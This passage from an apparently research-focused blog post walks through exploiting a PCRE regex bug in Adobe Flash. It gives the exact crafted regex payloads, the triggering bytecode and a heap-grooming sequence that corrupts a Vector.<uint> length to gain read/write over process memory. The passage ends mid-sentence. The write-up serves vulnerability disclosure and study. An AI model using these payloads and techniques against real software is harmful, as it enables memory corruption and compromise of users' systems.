pre-wrap;">offset_vector</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> is a stack buffer allocated in RegExpObject.cpp.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">ArrayObject* RegExpObject::_exec(Stringp subject,</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> StIndexableUTF8String& utf8Subject,</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> int startIndex,</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> int& matchIndex,</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> int& matchLen)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">{</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> AvmAssert(subject != NULL);</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">int ovector[OVECTOR_SIZE];</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> int results;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> int subjectLength = utf8Subject.length();</span></div> <br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">This is of little interest though; it’s unlikely that our single dword write off the end of that buffer is going to achieve anything useful - I didn’t check, but modern compiler mitigations, such as variable reordering and stack cookies should prevent this path from being exploitable, and we have an easier option available to us. In the case where we have more capturing groups in our regex than will fit in this buffer, PCRE will allocate a suitable buffer on the heap when it executes the expression.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">/* If the expression has got more back references than the offsets supplied can</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">hold, we get a temporary chunk of working store to use during the matching.</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">Otherwise, we can use the vector supplied, rounding down its size to a multiple</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">of 3. */</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">ocount = offsetcount - (offsetcount % 3);</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">if (</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 11px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">re->top_backref > 0 && re->top_backref >= ocount / 3</span><span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">{</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> ocount = re->top_backref * 3 + 3;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> md->offset_vector = (int *)(pcre_malloc)(ocount * sizeof(int));</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> if (md->offset_vector == NULL)</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> {</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> return PCRE_ERROR_NOMEMORY;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> }</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> </span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> using_temporary_offsets = TRUE;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> DPRINTF(("Got memory to hold back references\n"));</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">}</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">else</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">{</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;"> md->offset_vector = offsets;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">}</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">md->offset_end = ocount;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">md->offset_max = (2 * ocount) / 3;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">md->offset_overflow = FALSE;</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 11px; vertical-align: baseline; white-space: pre-wrap;">md->capture_last = -1;</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Excellent, things are coming together. We can now write a dword that we mostly control (it can’t really be very big) after the end of a heap allocation, as long as the allocation is at least larger than 99 * 4 = 396. As we need to write directly after the end of the allocation, looking at the Flash heap allocator tells us that 504 bytes is the first bucket size that we can match exactly; and we’ll need a</span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> md->top_backref == 41 </span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">to achieve this. This can simply be achieved by adding a some capturing groups and a back reference.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(\c衻+)?(?43)</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Another issue we’ll hit shortly is that Flash doesn’t validate whether the regex compiled successfully; if our first heap groom failed, then find_bracket will not find a match for the group, and compilation will fail. This is annoying when we’re trying to debug our exploit, so we can add a constant match string to the start of the regex that we can use to test whether the regex compiled successfully. </span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(c01db33f|</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41(\c衻+)?(?70)</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">)</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">As mentioned above; we’re going to need to have a heap groom to get our bytecode positioned directly after the buffer used to compile our regex into; to make things simple, we’ll pad our regex so that this buffer is a nice round number for the Flash heap allocator again; the next available bucket is 576 bytes, and each single character match adds 2 bytes.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(c01db33f|(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">AAAAAAAAAAAAAAAAAAAAAAAAAAA</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(\c衻*)?(?70))</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We need one more modification to make this useful; the value that we are overwriting with is the length of the current match, so we need a way to easily control that. We can just change the first group to match an arbitrary number of a different character, and we’re good to go:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">(c01db33f|(</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">B*</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)(A)\41AAAAAAAAAAAAAAAAAAAAAAAAAAA(\c衻*)?(?70))</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-style: italic; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">NB:</span><span style="font-family: Arial; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;"> in the exploit code, the B is replaced by one of a selection of characters - this is because Flash caches (successfully</span><span style="font-family: Arial; font-size: 15px; font-style: italic; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> and</span><span style="font-family: Arial; font-size: 15px; font-style: italic; vertical-align: baseline; white-space: pre-wrap;"> unsuccessfully) compiled regexes, and if our groom fails we want to actually force a recompilation of the regex.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So, this gets us the initial regex that we’re going to compile as the first stage of our exploit. We’ve figured out the payload bytecode that we need to trigger the OOB write, which is the following:</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0000</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5e00010046</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">94 CBRA</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">[1, 70]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">0005</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">5e00000000</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">94 CBRA </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #6aa84f; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> [0, 0]</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="color: #3c78d8; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">000a</span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #cc0000; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">6d </span><span style="font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> </span><span style="color: #f1c232; font-family: 'Courier New'; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> 109 ACCEPT</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The accept is needed since to successfully reach the write, we need for the group with number 0 to be a match; accept will force this with the least messing around required.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Now, it’s entirely the case that the write primitive we have would normally be quite annoying; in many situations this would barely be the start of an exploit - while we control the size of the allocation that we’re writing past the end of it has to be pretty large, which rules out a lot of objects with vtables; and since the value we’re overwriting with is the length of our current match, overwriting a pointer would be a mess anyway. Happily, in Flash, there is a one-size-fits-all solution to all heap exploitation woes - </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Vector.<uint>.</span><span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"> We can allocate these objects in any size we like (more-or-less), and the first dword is a length field. Once we’ve corrupted that length, we are going to have no problem producing an arbitrary read/write primitive, and getting stable exploitation.</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">1 - Compile regex</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">First we allocate a large number of buffers of size 504 (the same as our compiled regex) and fill them with our exploit bytecode.</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">exploit-bytecode------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">exploit-bytecode------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">exploit-bytecode------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We then free every second buffer, leaving a lot of nicely sized gaps that are too tempting for the Flash heap allocator to overlook.</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|exploit-bytecode------------|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">FREE </span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|exploit-bytecode------------|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">So that when we try to compile our regular expression, we’re almost certainly going to end up just where we want to be, with a copy of our exploit bytecode directly after the allocated buffer.</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|exploit-bytecode------------|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">ERCP|metadata|regex-bytecode</span><span style="background-color: white; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|exploit-bytecode------------|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <br /><br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">2 - Execute regex to corrupt vector length</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We’re actually going to be a bit more fancy here; since ideally we’d like to have a Vector.<uint> with length 0xffffffff so that we can read and write all of memory, we’ll actually make gaps followed by two Vector.<uint>’s. These allocations now need to be size 576, as that’s the size of our offset_vector.</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">length|vector---------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">length|vector---------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">length|vector---------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Like so:</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">FREE </span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|length|vector---------------|length|vector---------------|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">When our regex is executed, the current length of the match will be written one dword past the end of the allocated offset_vector, corrupting the length field of the first vector:</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">offset_vector---------------|corrupt</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|vector--------------|length|vector---------------|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">We only need to increase the length of the first vector by 1, and then we can use the first vector to completely control the length of the second vector:</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|offset_vector---------------|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">length+1|vector--------------------</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|vector---------------|</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;"> _______________________________________________________________________________________</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|offset_vector---------------|</span><span style="background-color: white; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">length+1|vector---------------|</span><span style="background-color: #93c47d; font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">UINT_MAX</span><span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">|vector-----------------------</span></div> <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: 'Courier New'; font-size: 9px; font-weight: bold; vertical-align: baseline; white-space: pre-wrap;">````````````````````````````````````````````````````````````````````````````````````````</span></div> <br /><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"> <span style="font-family: Arial; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">At this point, we have read-write access to the entire address space of the running Flash process, and it’s pretty much game over; the only remaining major issue is that we don’t know exactly where our extra-large </span><span style="font-family: Consolas; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Vector.<uint></span><span style="font-family: Consolas; font-size: 15px; font-weight: bold; 